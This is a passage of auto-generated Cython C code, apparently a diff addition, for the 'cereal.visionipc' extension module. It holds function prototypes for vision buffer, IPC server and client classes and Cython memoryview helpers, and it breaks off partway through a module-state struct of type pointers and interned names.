*__pyx_pf_8EnumBase_14__Pyx_EnumBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase___pyx_unpickle___Pyx_EnumMeta(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object); /* proto */ +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_get_endpoint_name(CYTHON_UNUSED PyObject *__pyx_self, std::string __pyx_v_name, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_stream); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_4data___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_5width___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6height___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_6stride___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_9uv_offset___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3rgb___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf___reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_2__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer___init__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, std::string __pyx_v_name); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_2create_buffers(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp, size_t __pyx_v_num_buffers, bool __pyx_v_rgb, size_t __pyx_v_width, size_t __pyx_v_height); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_4create_buffers_with_sizes(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp, size_t __pyx_v_num_buffers, bool __pyx_v_rgb, size_t __pyx_v_width, size_t __pyx_v_height, size_t __pyx_v_size, size_t __pyx_v_stride, size_t __pyx_v_uv_offset); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_6send(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_tp, __Pyx_memviewslice __pyx_v_data, uint32_t __pyx_v_frame_id, uint64_t __pyx_v_timestamp_sof, uint64_t __pyx_v_timestamp_eof); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_8start_listener(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self); /* proto */ +static void __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_10__dealloc__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_12__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_14__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient___cinit__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, std::string __pyx_v_name, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_stream, bool __pyx_v_conflate); /* proto */ +static void __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_2__dealloc__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5width___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6height___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6stride___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9uv_offset___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3rgb___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10buffer_len___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11num_buffers___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8frame_id___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_sof___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13timestamp_eof___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5valid___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_4recv(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, int __pyx_v_timeout_ms); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6connect(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, bool __pyx_v_blocking); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_8is_connected(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10available_streams(std::string __pyx_v_name, bool __pyx_v_block); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_12__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_14__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionBuf(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static __Pyx_CachedCFunction __pyx_umethod_PyDict_Type_get = {0, 0, 0, 0, 0}; +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_7cpython_4type_type; + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_5numpy_dtype; + PyTypeObject *__pyx_ptype_5numpy_flatiter; + PyTypeObject *__pyx_ptype_5numpy_broadcast; + PyTypeObject *__pyx_ptype_5numpy_ndarray; + PyTypeObject *__pyx_ptype_5numpy_generic; + PyTypeObject *__pyx_ptype_5numpy_number; + PyTypeObject *__pyx_ptype_5numpy_integer; + PyTypeObject *__pyx_ptype_5numpy_signedinteger; + PyTypeObject *__pyx_ptype_5numpy_unsignedinteger; + PyTypeObject *__pyx_ptype_5numpy_inexact; + PyTypeObject *__pyx_ptype_5numpy_floating; + PyTypeObject *__pyx_ptype_5numpy_complexfloating; + PyTypeObject *__pyx_ptype_5numpy_flexible; + PyTypeObject *__pyx_ptype_5numpy_character; + PyTypeObject *__pyx_ptype_5numpy_ufunc; + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + PyObject *__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer; + PyObject *__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient; + PyObject *__Pyx_EnumMeta; + PyObject *__pyx_type___pyx_array; + PyObject *__pyx_type___pyx_MemviewEnum; + PyObject *__pyx_type___pyx_memoryview; + PyObject *__pyx_type___pyx_memoryviewslice; + #endif + PyTypeObject *__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + PyTypeObject *__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer; + PyTypeObject *__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient; + PyTypeObject *__pyx_ptype___Pyx_EnumMeta; + PyTypeObject *__pyx_array_type; + PyTypeObject *__pyx_MemviewEnum_type; + PyTypeObject *__pyx_memoryview_type; + PyTypeObject *__pyx_memoryviewslice_type; + PyObject *__pyx_kp_b_; + PyObject *__pyx_kp_s_; + PyObject *__pyx_n_s_ASCII; + PyObject *__pyx_kp_s_All_dimensions_preceding_dimensi; + PyObject *__pyx_n_s_AssertionError; + PyObject *__pyx_kp_s_Buffer_view_does_not_expose_stri; + PyObject *__pyx_kp_s_Can_only_create_a_buffer_that_is; + PyObject *__pyx_kp_s_Cannot_assign_to_read_only_memor; + PyObject *__pyx_kp_s_Cannot_create_writable_memory_vi; + PyObject *__pyx_kp_u_Cannot_index_with_type; + PyObject *__pyx_kp_s_Cannot_transpose_memoryview_with; + PyObject *__pyx_kp_s_Dimension_d_is_not_direct; + PyObject *__pyx_n_s_Ellipsis; + PyObject *__pyx_kp_s_Empty_shape_tuple_for_cython_arr; + PyObject *__pyx_n_s_EnumBase; + PyObject *__pyx_n_s_EnumType; + PyObject *__pyx_n_s_ImportError; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2; + PyObject *__pyx_n_s_IndexError; + PyObject *__pyx_kp_s_Index_out_of_bounds_axis_d; + PyObject *__pyx_kp_s_Indirect_dimensions_not_supporte; + PyObject *__pyx_n_s_IntEnum; + PyObject *__pyx_n_s_IntFlag; + PyObject *__pyx_kp_u_Invalid_mode_expected_c_or_fortr; + PyObject *__pyx_kp_u_Invalid_shape_in_axis; + PyObject *__pyx_n_s_MemoryError; + PyObject *__pyx_kp_s_MemoryView_of_r_at_0x_x; + PyObject *__pyx_kp_s_MemoryView_of_r_object; + PyObject *__pyx_n_b_O; + PyObject *__pyx_n_s_OrderedDict; + PyObject *__pyx_kp_u_Out_of_bounds_on_buffer_access_a; + PyObject *__pyx_n_s_PickleError; + PyObject *__pyx_n_s_Pyx_EnumBase; + PyObject *__pyx_n_s_Pyx_EnumBase___new; + PyObject *__pyx_n_s_Pyx_EnumBase___repr; + PyObject *__pyx_n_s_Pyx_EnumBase___str; + PyObject *__pyx_n_s_Pyx_EnumMeta___reduce_cython; + PyObject *__pyx_n_s_Pyx_EnumMeta___setstate_cython; + PyObject *__pyx_n_s_Pyx_FlagBase; + PyObject *__pyx_n_s_Pyx_FlagBase___new; + PyObject *__pyx_n_s_Pyx_FlagBase___repr; + PyObject *__pyx_n_s_Pyx_FlagBase___str; + PyObject *__pyx_n_s_Sequence; + PyObject *__pyx_kp_s_Step_may_not_be_zero_axis_d; + PyObject *__pyx_kp_b_T; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_kp_s_Unable_to_convert_item_to_object; + PyObject *__pyx_kp_s_Unknown_enum_value_s; + PyObject *__pyx_n_s_VISION_STREAM_DRIVER; + PyObject *__pyx_n_s_VISION_STREAM_MAP; + PyObject *__pyx_n_s_VISION_STREAM_ROAD; + PyObject *__pyx_n_s_VISION_STREAM_WIDE_ROAD; + PyObject *__pyx_n_s_ValueError; + PyObject *__pyx_n_s_View_MemoryView; + PyObject *__pyx_n_s_VisionBuf; + PyObject *__pyx_n_s_VisionBuf___reduce_cython; + PyObject *__pyx_n_s_VisionBuf___setstate_cython; + PyObject *__pyx_n_s_VisionIpcClient; + PyObject *__pyx_n_s_VisionIpcClient___reduce_cython; + PyObject *__pyx_n_s_VisionIpcClient___setstate_cytho; + PyObject *__pyx_n_s_VisionIpcClient_available_stream; + PyObject *__pyx_n_s_VisionIpcClient_connect; + PyObject *__pyx_n_s_VisionIpcClient_is_connected; + PyObject *__pyx_n_s_VisionIpcClient_recv; + PyObject *__pyx_n_s_VisionIpcServer; + PyObject *__pyx_n_s_VisionIpcServer___reduce_cython; + PyObject *__pyx_n_s_VisionIpcServer___setstate_cytho; + PyObject *__pyx_n_s_VisionIpcServer_create_buffers; + PyObject *__pyx_n_s_VisionIpcServer_create_buffers_w; + PyObject *__pyx_n_s_VisionIpcServer_send; + PyObject *__pyx_n_s_VisionIpcServer_start_listener; + PyObject *__pyx_n_s_VisionStreamType; + PyObject *__pyx_kp_b__11; + PyObject *__pyx_kp_b__12; + PyObject *__pyx_kp_b__13; + PyObject *__pyx_kp_u__14; + PyObject *__pyx_kp_u__15; + PyObject *__pyx_kp_u__3; + PyObject *__pyx_kp_u__4; + PyObject *__pyx_n_s__5; + PyObject *__pyx_n_s__68; + PyObject *__pyx_kp_u__8; + PyObject *__pyx_kp_u__9; + PyObject *__pyx_n_s_abc; + PyObject *__pyx_n_s_allocate_buffer; + PyObject *__pyx_kp_u_and; + PyObject *__pyx_n_s_asarray; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_available_streams; + PyObject *__pyx_n_s_base; + PyObject *__pyx_n_s_block; + PyObject *__pyx_n_s_blocking; + PyObject *__pyx_n_s_buf; + PyObject *__pyx_n_s_c; + PyObject *__pyx_n_u_c; + PyObject *__pyx_kp_s_cereal_visionipc_visionipc_pyx; + PyObject *__pyx_kp_s_cereal_visionipc_visionipc_pyx_p; + PyObject *__pyx_n_s_class; + PyObject *__pyx_n_s_class_getitem; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_cls; + PyObject *__pyx_n_s_collections; + PyObject *__pyx_kp_s_collections_abc; + PyObject *__pyx_n_s_conflate; + PyObject *__pyx_n_s_connect; + PyObject *__pyx_kp_s_contiguous_and_direct; + PyObject *__pyx_kp_s_contiguous_and_indirect; + PyObject *__pyx_n_s_count; + PyObject *__pyx_n_s_create_buffers; + PyObject *__pyx_n_s_create_buffers_with_sizes; + PyObject *__pyx_n_s_data; + PyObject *__pyx_n_s_dct; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_n_s_dict_2; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_doc; + PyObject *__pyx_n_s_dtype_is_object; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_encode; + PyObject *__pyx_n_s_enum; + PyObject *__pyx_n_s_enumerate; + PyObject *__pyx_n_s_error; + PyObject *__pyx_n_s_extra; + PyObject *__pyx_n_s_flags; + PyObject *__pyx_n_s_format; + PyObject *__pyx_n_s_fortran; + PyObject *__pyx_n_u_fortran; + PyObject *__pyx_n_s_frame_id; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_get; + PyObject *__pyx_n_s_get_endpoint_name; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_kp_u_got; + PyObject *__pyx_kp_u_got_differing_extents_in_dimensi; + PyObject *__pyx_n_s_height; + PyObject *__pyx_n_s_id; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_index; + PyObject *__pyx_n_s_init; + PyObject *__pyx_n_s_init_subclass; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_is_connected; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_itemsize; + PyObject *__pyx_kp_s_itemsize_0_for_cython_array; + PyObject *__pyx_n_s_join; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_member_names; + PyObject *__pyx_n_s_members; + PyObject *__pyx_n_s_memview; + PyObject *__pyx_n_s_metaclass; + PyObject *__pyx_n_s_mode; + PyObject *__pyx_n_s_module; + PyObject *__pyx_n_s_module_2; + PyObject *__pyx_n_s_mro_entries; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_name_2; + PyObject *__pyx_n_s_ndim; + PyObject *__pyx_n_s_new; + PyObject *__pyx_kp_s_no_default___reduce___due_to_non; + PyObject *__pyx_n_s_np; + PyObject *__pyx_n_s_num_buffers; + PyObject *__pyx_n_s_numpy; + PyObject *__pyx_kp_u_numpy_core_multiarray_failed_to; + PyObject *__pyx_kp_u_numpy_core_umath_failed_to_impor; + PyObject *__pyx_n_s_obj; + PyObject *__pyx_n_s_pack; + PyObject *__pyx_n_s_parents; + PyObject *__pyx_n_s_pickle; + PyObject *__pyx_n_s_prepare; + PyObject *__pyx_n_s_pyx_PickleError; + PyObject *__pyx_n_s_pyx_checksum; + PyObject *__pyx_n_s_pyx_result; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_type; + PyObject *__pyx_n_s_pyx_unpickle_Enum; + PyObject *__pyx_n_s_pyx_unpickle___Pyx_EnumMeta; + PyObject *__pyx_n_s_pyx_vtable; + PyObject *__pyx_n_s_qualname; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_recv; + 